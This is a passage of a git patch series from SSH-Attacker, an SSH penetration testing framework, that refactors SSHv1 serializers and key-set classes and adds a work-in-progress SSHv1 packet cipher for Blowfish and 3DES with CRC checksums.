ClientSessionKeyMessageSerializer( - ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { + public ClientSessionKeyMessageSerializer(ClientSessionKeyMessage message) { super(message); - this.combiner = combiner; } private void serializieCipherType() { @@ -60,7 +56,7 @@ private void serializeProtocolFlags() { private void serializCRCChecksum() { CRC crc32 = new CRC(); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); - appendBytes(checksum); + // appendBytes(checksum); LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java index 161c69de9..089bb0bf0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; -import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; import org.apache.logging.log4j.LogManager; @@ -16,12 +15,9 @@ public class DisconnectMessageSerializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - private HybridKeyExchangeCombiner combiner; - public DisconnectMessageSerializier( - DisconnectMessage message, HybridKeyExchangeCombiner combiner) { + public DisconnectMessageSerializier(DisconnectMessage message) { super(message); - this.combiner = combiner; } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index fbfafabee..82c80b15b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -8,8 +8,6 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; -import de.rub.nds.sshattacker.core.crypto.checksum.CRC; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import org.apache.logging.log4j.LogManager; @@ -18,23 +16,9 @@ public class ServerPublicKeyMessageSerializer extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - private HybridKeyExchangeCombiner combiner; - public ServerPublicKeyMessageSerializer( - ServerPublicKeyMessage message, HybridKeyExchangeCombiner combiner) { + public ServerPublicKeyMessageSerializer(ServerPublicKeyMessage message) { super(message); - this.combiner = combiner; - } - - @Override - public void serializeMessageSpecificContents() { - serializeCookie(); - serializeServerKeyBytes(); - serializeHostKeyBytes(); - serializeProtocolFlags(); - serializeCipherMask(); - serializeSupportedAuthMask(); - serializCRCChecksum(); } private void serializeProtocolFlags() { @@ -55,13 +39,6 @@ private void serializeSupportedAuthMask() { LOGGER.debug("AuthMasks: " + Integer.toBinaryString(authMask)); } - private void serializCRCChecksum() { - CRC crc32 = new CRC(); - byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(getAlreadySerialized()), 4); - appendBytes(checksum); - LOGGER.debug("CRC: " + ArrayConverter.bytesToRawHexString(checksum)); - } - private void serializeCookie() { appendBytes(message.getAntiSpoofingCookie().getValue()); LOGGER.debug( @@ -102,4 +79,14 @@ private void serializeHostKeyBytes() { ArrayConverter.bytesToHexString( message.getHostKey().getPublicKey().getModulus().toByteArray())); } + + @Override + public void serializeMessageSpecificContents() { + serializeCookie(); + serializeServerKeyBytes(); + serializeHostKeyBytes(); + serializeProtocolFlags(); + serializeCipherMask(); + serializeSupportedAuthMask(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 0e82b260a..1cc81791d 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -18,6 +18,7 @@ import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import jakarta.xml.bind.annotation.XmlElement; @@ -172,7 +173,8 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1"), @XmlElement( type = ClientSessionKeyMessage.class, - name = "ClientSessionKeyMessageSSH1") + name = "ClientSessionKeyMessageSSH1"), + @XmlElement(type = SuccessMessage.class, name = "SuccessMessageSSH1") }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index ea8b5df72..b33e38850 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -16,6 +16,7 @@ import de.rub.nds.sshattacker.core.protocol.connection.message.*; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.state.State; @@ -162,7 +163,8 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { @XmlElement(type = ServerPublicKeyMessage.class, name = "PublicKeyMessageSSH1"), @XmlElement( type = ClientSessionKeyMessage.class, - name = "ClientSessionKeyMessageSSH1") + name = "ClientSessionKeyMessageSSH1"), + @XmlElement(type = SuccessMessage.class, name = "SuccessMessageSSH1") }) protected List> expectedMessages = new ArrayList<>(); From a0bbdde68b659a08c659a9abc20e1de427c5fe37 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 17 Sep 2023 01:14:56 +0200 Subject: [PATCH 081/176] wip: implmenting krypto --- .../core/layer/context/SshContext.java | 8 +- .../cipher/PacketChaCha20Poly1305Cipher.java | 5 +- .../core/packet/cipher/PacketCipher.java | 8 +- .../packet/cipher/PacketCipherFactory.java | 12 +- .../core/packet/cipher/PacketGCMCipher.java | 4 +- .../core/packet/cipher/PacketMacedCipher.java | 21 +- .../core/packet/cipher/PacketSsh1Cipher.java | 478 ++++++++++++++++++ .../keys/{KeySet.java => AbstractKeySet.java} | 6 +- .../packet/cipher/keys/KeySetGenerator.java | 179 ++++--- .../core/packet/cipher/keys/SSHv1KeySet.java | 126 +++++ .../core/packet/cipher/keys/SSHv2KeySet.java | 170 +++++++ .../parser/BinaryPacketParserSSHv1.java | 14 + .../BinaryPacketSerializerSSHv1.java | 2 +- .../ClientSessionKeyMessageHandler.java | 181 ++++++- .../ClientSessionKeyMessagePreparator.java | 57 ++- .../handler/NewKeysMessageHandler.java | 10 +- .../core/protocol/util/KeyExchangeUtil.java | 4 +- .../action/ActivateEncryptionAction.java | 4 +- 18 files changed, 1193 insertions(+), 96 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java rename SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/{KeySet.java => AbstractKeySet.java} (98%) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv1KeySet.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/keys/SSHv2KeySet.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index a49e95fbd..40c2d4f40 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -19,7 +19,7 @@ import de.rub.nds.sshattacker.core.layer.impl.PacketLayer; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.sshattacker.core.packet.compressor.PacketCompressor; import de.rub.nds.sshattacker.core.packet.crypto.AbstractPacketEncryptor; import de.rub.nds.sshattacker.core.packet.crypto.PacketEncryptor; @@ -240,7 +240,7 @@ public PacketCipher getActiveDecryptCipher() { /** The shared secret established by the negotiated key exchange method */ private byte[] sharedSecret; /** The key set derived from the shared secret, the exchange hash, and the session ID */ - private KeySet keySet; + private AbstractKeySet keySet; private byte[] sshv1SessionID; @@ -901,7 +901,7 @@ public Optional getSharedSecret() { return Optional.ofNullable(sharedSecret); } - public Optional getKeySet() { + public Optional getKeySet() { return Optional.ofNullable(keySet); } // endregion @@ -918,7 +918,7 @@ public void setSharedSecret(byte[] sharedSecret) { this.sharedSecret = sharedSecret; } - public void setKeySet(KeySet transportKeySet) { + public void setKeySet(AbstractKeySet transportKeySet) { this.keySet = transportKeySet; } // endregion diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java index 678fe1efe..1c6a1c5af 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketChaCha20Poly1305Cipher.java @@ -17,7 +17,7 @@ import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import java.util.Arrays; import java.util.stream.Collectors; import java.util.stream.Stream; @@ -43,7 +43,8 @@ public class PacketChaCha20Poly1305Cipher extends PacketCipher { /** ChaCha20-Poly1305 instance keyed with K_2 for main packet encryption / decryption. */ private final AbstractCipher mainCipher; - public PacketChaCha20Poly1305Cipher(SshContext context, KeySet keySet, CipherMode mode) { + public PacketChaCha20Poly1305Cipher( + SshContext context, AbstractKeySet keySet, CipherMode mode) { super(context, keySet, EncryptionAlgorithm.CHACHA20_POLY1305_OPENSSH_COM, null, mode); headerCipher = CipherFactory.getCipher( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java index b3d28f242..b0b64b970 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipher.java @@ -15,7 +15,7 @@ import de.rub.nds.sshattacker.core.packet.BinaryPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.tlsattacker.transport.ConnectionEndType; import java.io.ByteArrayInputStream; import java.util.Arrays; @@ -29,7 +29,7 @@ public abstract class PacketCipher { /** The SSH context this packet cipher is used in. */ protected final SshContext context; /** The key set used by the cipher. */ - protected final KeySet keySet; + protected final AbstractKeySet keySet; /** The encryption algorithm to use. */ protected final EncryptionAlgorithm encryptionAlgorithm; /** The MAC algorithm to use. This may be null if using an AEAD encryption algorithm. */ @@ -39,7 +39,7 @@ public abstract class PacketCipher { public PacketCipher( SshContext context, - KeySet keySet, + AbstractKeySet keySet, EncryptionAlgorithm encryptionAlgorithm, MacAlgorithm macAlgorithm, CipherMode mode) { @@ -108,7 +108,7 @@ public MacAlgorithm getMacAlgorithm() { return macAlgorithm; } - public KeySet getKeySet() { + public AbstractKeySet getKeySet() { return keySet; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java index 6bcc89e68..cf5f4ac91 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketCipherFactory.java @@ -12,7 +12,7 @@ import de.rub.nds.sshattacker.core.constants.EncryptionMode; import de.rub.nds.sshattacker.core.constants.MacAlgorithm; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -22,7 +22,7 @@ public class PacketCipherFactory { public static PacketCipher getPacketCipher( SshContext context, - KeySet keySet, + AbstractKeySet keySet, EncryptionAlgorithm encryptionAlgorithm, MacAlgorithm macAlgorithm, CipherMode mode) { @@ -31,13 +31,19 @@ public static PacketCipher getPacketCipher( return new PacketChaCha20Poly1305Cipher(context, keySet, mode); } else if (encryptionAlgorithm.getMode() == EncryptionMode.GCM) { return new PacketGCMCipher(context, keySet, encryptionAlgorithm, mode); + } else if (encryptionAlgorithm == EncryptionAlgorithm.BLOWFISH_CBC) { + return new PacketSsh1Cipher( + context, keySet, EncryptionAlgorithm.BLOWFISH_CBC, null, mode); + } else if (encryptionAlgorithm == EncryptionAlgorithm.TRIPLE_DES_CBC) { + return new PacketSsh1Cipher( + context, keySet, EncryptionAlgorithm.TRIPLE_DES_CBC, null, mode); } else { return new PacketMacedCipher( context, keySet, encryptionAlgorithm, macAlgorithm, mode); } } catch (Exception e) { LOGGER.warn( - "Could not create PacketCipher with encryotion algorithm '{}' and MAC algorithm '{}'! Creating 'none' Cipher instead", + "Could not create PacketCipher with encryption algorithm '{}' and MAC algorithm '{}'! Creating 'none' Cipher instead", encryptionAlgorithm, macAlgorithm, e); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java index 1aaa013a4..e2e8fdcd3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketGCMCipher.java @@ -17,7 +17,7 @@ import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.PacketCryptoComputations; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import de.rub.nds.sshattacker.core.util.Converter; import java.util.Arrays; import java.util.stream.Collectors; @@ -39,7 +39,7 @@ public class PacketGCMCipher extends PacketCipher { public PacketGCMCipher( SshContext context, - KeySet keySet, + AbstractKeySet keySet, EncryptionAlgorithm encryptionAlgorithm, CipherMode mode) { super(context, keySet, encryptionAlgorithm, null, mode); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index cc00e2637..c7a7b42d6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -18,7 +18,7 @@ import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.packet.*; -import de.rub.nds.sshattacker.core.packet.cipher.keys.KeySet; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; import java.math.BigInteger; import java.security.NoSuchAlgorithmException; import java.util.Arrays; @@ -43,7 +43,7 @@ public class PacketMacedCipher extends PacketCipher { public PacketMacedCipher( SshContext context, - KeySet keySet, + AbstractKeySet keySet, EncryptionAlgorithm encryptionAlgorithm, MacAlgorithm macAlgorithm, CipherMode mode) { @@ -88,10 +88,14 @@ public PacketMacedCipher( private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { CRC crc32 = new CRC(); - byte[] value = - ArrayConverter.concatenate( - binaryPacket.getPadding().getValue(), - binaryPacket.getCompressedPayload().getValue()); + /* + byte[] value = + ArrayConverter.concatenate( + binaryPacket.getPadding().getValue(), + binaryPacket.getCompressedPayload().getValue()); + */ + + byte[] value = binaryPacket.getCompressedPayload().getValue(); byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(value), 4); binaryPacket.setCrcChecksum(checksum); LOGGER.debug( @@ -115,6 +119,11 @@ public void encrypt(BinaryPacketSSHv1 packet) { calculateCrcChecksum(packet); + packet.setCompressedPayload( + ArrayConverter.concatenate( + packet.getCompressedPayload().getValue(), + packet.getCrcChecksum().getValue())); + PacketCryptoComputations computations = packet.getComputations(); try { encryptInner(packet); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java new file mode 100644 index 000000000..62f6f93d7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketSsh1Cipher.java @@ -0,0 +1,478 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.packet.cipher; + +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.checksum.CRC; +import de.rub.nds.sshattacker.core.crypto.cipher.AbstractCipher; +import de.rub.nds.sshattacker.core.crypto.cipher.CipherFactory; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.*; +import de.rub.nds.sshattacker.core.packet.cipher.keys.AbstractKeySet; +import java.math.BigInteger; +import java.util.Arrays; +import java.util.stream.Collectors; +import java.util.stream.Stream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PacketSsh1Cipher extends PacketCipher { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** Cipher for encryption / decryption of packets. */ + private final AbstractCipher cipher; + + /** + * Next IV for packet processing. Might be null if the encryption algorithm does not use an IV. + */ + private byte[] nextIv; + + public PacketSsh1Cipher( + SshContext context, + AbstractKeySet keySet, + EncryptionAlgorithm encryptionAlgorithm, + MacAlgorithm macAlgorithm, + CipherMode mode) { + super(context, keySet, encryptionAlgorithm, macAlgorithm, mode); + cipher = + CipherFactory.getCipher( + encryptionAlgorithm, + keySet == null + ? null + : mode == CipherMode.ENCRYPT + ? keySet.getWriteEncryptionKey(getLocalConnectionEndType()) + : keySet.getReadEncryptionKey(getLocalConnectionEndType())); + + if (encryptionAlgorithm.getIVSize() > 0) { + // Encryption algorithm does use an IV + nextIv = + mode == CipherMode.ENCRYPT + ? keySet.getWriteIv(getLocalConnectionEndType()) + : keySet.getReadIv(getLocalConnectionEndType()); + } + } + + private void calculateCrcChecksum(BinaryPacketSSHv1 binaryPacket) { + CRC crc32 = new CRC(); + /* byte[] value = + ArrayConverter.concatenate( + binaryPacket.getPadding().getValue(), + binaryPacket.getCompressedPayload().getValue());*/ + + byte[] value = binaryPacket.getCompressedPayload().getValue(); + + LOGGER.debug("Calculating Checksum over {}", value); + byte[] checksum = ArrayConverter.longToBytes(crc32.calculateCRC(value), 4); + binaryPacket.setCrcChecksum(checksum); + LOGGER.debug( + "CRC: " + + ArrayConverter.bytesToRawHexString( + binaryPacket.getCrcChecksum().getValue())); + } + + @Override + public void encrypt(BinaryPacketSSHv1 packet) { + + packet.setLength( + packet.getCompressedPayload().getValue().length + 4); // +4 for CRC-Checksum + + packet.setPaddingLength(calculatePaddingLengthSSHv1(packet)); + packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); + + packet.setCompressedPayload( + ArrayConverter.concatenate( + packet.getPadding().getValue(), packet.getCompressedPayload().getValue())); + + calculateCrcChecksum(packet); + + // [bro] not so nice - needs to be redone! + packet.setCompressedPayload( + ArrayConverter.concatenate( + packet.getCompressedPayload().getValue(), + packet.getCrcChecksum().getValue())); + + PacketCryptoComputations computations = packet.getComputations(); + + try { + encryptInner(packet); + } catch (CryptoException e) { + throw new RuntimeException(e); + } + + computations.setEncryptedPacketFields( + Stream.of(BinaryPacketField.PAYLOAD).collect(Collectors.toSet())); + } + + @Override + public void encrypt(BinaryPacket packet) throws CryptoException { + if (packet.getComputations() == null) { + LOGGER.warn("Packet computations are not prepared."); + packet.prepareComputations(); + } + PacketCryptoComputations computations = packet.getComputations(); + + if (keySet != null) { + computations.setEncryptionKey( + keySet.getWriteEncryptionKey(getLocalConnectionEndType())); + computations.setIntegrityKey(keySet.getWriteIntegrityKey(getLocalConnectionEndType())); + } + + packet.setPaddingLength(calculatePaddingLength(packet)); + packet.setPadding(calculatePadding(packet.getPaddingLength().getValue())); + packet.setLength(calculatePacketLength(packet)); + + if (isEncryptThenMac()) { + // Encryption + computations.setPlainPacketBytes( + ArrayConverter.concatenate( + new byte[] {packet.getPaddingLength().getValue()}, + packet.getCompressedPayload().getValue(), + packet.getPadding().getValue())); + encryptInner(packet); + computations.setEncryptedPacketFields( + Stream.of( + BinaryPacketField.PADDING_LENGTH, + BinaryPacketField.PAYLOAD, + BinaryPacketField.PADDING) + .collect(Collectors.toSet())); + + // Integrity protection + computations.setAuthenticatedPacketBytes( + ArrayConverter.concatenate( + packet.getLength() + .getByteArray(BinaryPacketConstants.PACKET_FIELD_LENGTH), + packet.getCiphertext().getValue())); + } else { + // Encryption + computations.setPlainPacketBytes( + ArrayConverter.concatenate( + packet.getLength() + .getByteArray(BinaryPacketConstants.PACKET_FIELD_LENGTH), + new byte[] {packet.getPaddingLength().getValue()}, + packet.getCompressedPayload().getValue(), + packet.getPadding().getValue())); + encryptInner(packet); + computations.setEncryptedPacketFields( + Stream.of( + BinaryPacketField.PACKET_LENGTH, + BinaryPacketField.PADDING_LENGTH, + BinaryPacketField.PAYLOAD, + BinaryPacketField.PADDING) + .collect(Collectors.toSet())); + + // Integrity protection + computations.setAuthenticatedPacketBytes( + ArrayConverter.concatenate( + packet.getLength() + .getByteArray(BinaryPacketConstants.PACKET_FIELD_LENGTH), + new byte[] {packet.getPaddingLength().getValue()}, + packet.getCompressedPayload().getValue(), + packet.getPadding().getValue())); + } + + computations.setPaddingValid(true); + computations.setMacValid(true); + } + + @Override + public void encrypt(BlobPacket packet) throws CryptoException { + encryptInner(packet); + } + + private void encryptInner(AbstractPacket packet) throws CryptoException { + byte[] plainData; + if (packet instanceof BinaryPacket) { + plainData = ((BinaryPacket) packet).getComputations().getPlainPacketBytes().getValue(); + LOGGER.debug( + "PlainData from Computation: {}", ArrayConverter.bytesToHexString(plainData)); + } else { + plainData = packet.getCompressedPayload().getValue(); + LOGGER.debug( + "PlainData from Compression: {}", ArrayConverter.bytesToHexString(plainData)); + } + + if (encryptionAlgorithm.getIVSize() > 0) { + // Encryption with IV + byte[] iv = nextIv; + if (packet instanceof BinaryPacket) { + // Apply modifications to IV (if any) + PacketCryptoComputations computations = ((BinaryPacket) packet).getComputations(); + computations.setIv(iv); + iv = computations.getIv().getValue(); + } + LOGGER.info("Plain data to encrypt is {}", plainData); + packet.setCiphertext(cipher.encrypt(plainData, iv)); + nextIv = extractNextIv(nextIv, packet.getCiphertext().getOriginalValue()); + } else { + // Encryption without IV + packet.setCiphertext(cipher.encrypt(plainData)); + } + } + + @Override + public void decrypt(BinaryPacketSSHv1 packet) throws CryptoException { + decryptInner(packet); + + DecryptionParser parser = new DecryptionParser(packet.getPayload().getValue()); + + packet.setPaddingLength(8 - packet.getLength().getValue() % 8); + packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); + + byte[] newPayload = parser.parseByteArrayField(packet.getLength().getValue() - 4); + + packet.setCrcChecksum(parser.parseByteArrayField(4)); + + LOGGER.debug("DEBUGGER"); + LOGGER.debug( + "Padding: {}", ArrayConverter.bytesToHexString(packet.getPadding().getValue())); + LOGGER.debug("Payload: {}", ArrayConverter.bytesToHexString(newPayload)); + LOGGER.debug( + "CRC_Checksum: {}", + ArrayConverter.bytesToHexString(packet.getCrcChecksum().getValue())); + + packet.setCompressedPayload(newPayload); + } + + @Override + public void decrypt(BinaryPacket packet) throws CryptoException { + if (packet.getComputations() == null) { + LOGGER.warn("Packet computations are not prepared."); + packet.prepareComputations(); + } + PacketCryptoComputations computations = packet.getComputations(); + + if (keySet != null) { + computations.setEncryptionKey(keySet.getReadEncryptionKey(getLocalConnectionEndType())); + computations.setIntegrityKey(keySet.getReadIntegrityKey(getLocalConnectionEndType())); + } + + decryptInner(packet); + + DecryptionParser parser = + new DecryptionParser( + computations.getPlainPacketBytes().getValue(), + isEncryptThenMac() ? 0 : BinaryPacketConstants.PACKET_FIELD_LENGTH); + + packet.setPaddingLength(parser.parseByteField(BinaryPacketConstants.PADDING_FIELD_LENGTH)); + LOGGER.debug("[bro] Padding Lenght:" + packet.getPaddingLength().getValue().intValue()); + packet.setCompressedPayload( + parser.parseByteArrayField( + packet.getLength().getValue() + - packet.getPaddingLength().getValue() + - BinaryPacketConstants.PADDING_FIELD_LENGTH)); + packet.setPadding(parser.parseByteArrayField(packet.getPaddingLength().getValue())); + + LOGGER.debug( + "[bro] Compressed Payload:" + + ArrayConverter.bytesToHexString( + packet.getCompressedPayload().getValue())); + + if (isEncryptThenMac()) { + computations.setEncryptedPacketFields( + Stream.of( + BinaryPacketField.PADDING_LENGTH, + BinaryPacketField.PAYLOAD, + BinaryPacketField.PADDING) + .collect(Collectors.toSet())); + + computations.setAuthenticatedPacketBytes( + ArrayConverter.concatenate( + packet.getLength() + .getByteArray(BinaryPacketConstants.PACKET_FIELD_LENGTH), + packet.getCiphertext().getValue())); + } else { + computations.setEncryptedPacketFields( + Stream.of( + BinaryPacketField.PACKET_LENGTH, + BinaryPacketField.PADDING, + BinaryPacketField.PAYLOAD, + BinaryPacketField.PADDING_LENGTH) + .collect(Collectors.toSet())); + + computations.setAuthenticatedPacketBytes( + ArrayConverter.concatenate( + packet.getLength() + .getByteArray(BinaryPacketConstants.PACKET_FIELD_LENGTH), + new byte[] {packet.getPaddingLength().getValue()}, + packet.getCompressedPayload().getValue(), + packet.getPadding().getValue())); + } + } + + @Override + public void decrypt(BlobPacket packet) throws CryptoException { + decryptInner(packet); + } + + private void decryptInner(AbstractPacket packet) throws CryptoException { + byte[] plainData; + if (packet instanceof BinaryPacket) { + PacketCryptoComputations computations = ((BinaryPacket) packet).getComputations(); + if (computations.isPlainPacketBytesFirstBlockOnly()) { + byte[] firstBlock = computations.getPlainPacketBytes().getOriginalValue(); + byte[] ciphertext = packet.getCiphertext().getValue(); + byte[] remainingBlocks; + if (encryptionAlgorithm.getIVSize() > 0) { + // Case 1a: Binary packet / First block decrypted / Cipher with IV + computations.setIv(nextIv); + byte[] remainingBlocksIv = + extractNextIv( + nextIv, + Arrays.copyOfRange( + packet.getCiphertext().getValue(), + 0, + firstBlock.length)); + remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length), + remainingBlocksIv); + } else { + // Case 1b: Binary packet / First block decrypted / Cipher without IV + remainingBlocks = + cipher.decrypt( + Arrays.copyOfRange( + ciphertext, firstBlock.length, ciphertext.length)); + } + plainData = ArrayConverter.concatenate(firstBlock, remainingBlocks); + } else { + if (encryptionAlgorithm.getIVSize() > 0) { + // Case 2a: Binary packet / First block not decrypted / Cipher with IV + computations.setIv(nextIv); + plainData = + cipher.decrypt( + packet.getCiphertext().getValue(), + computations.getIv().getValue()); + } else { + // Case 2b: Binary packet / First block not decrypted / Cipher without IV + plainData = cipher.decrypt(packet.getCiphertext().getValue()); + } + } + 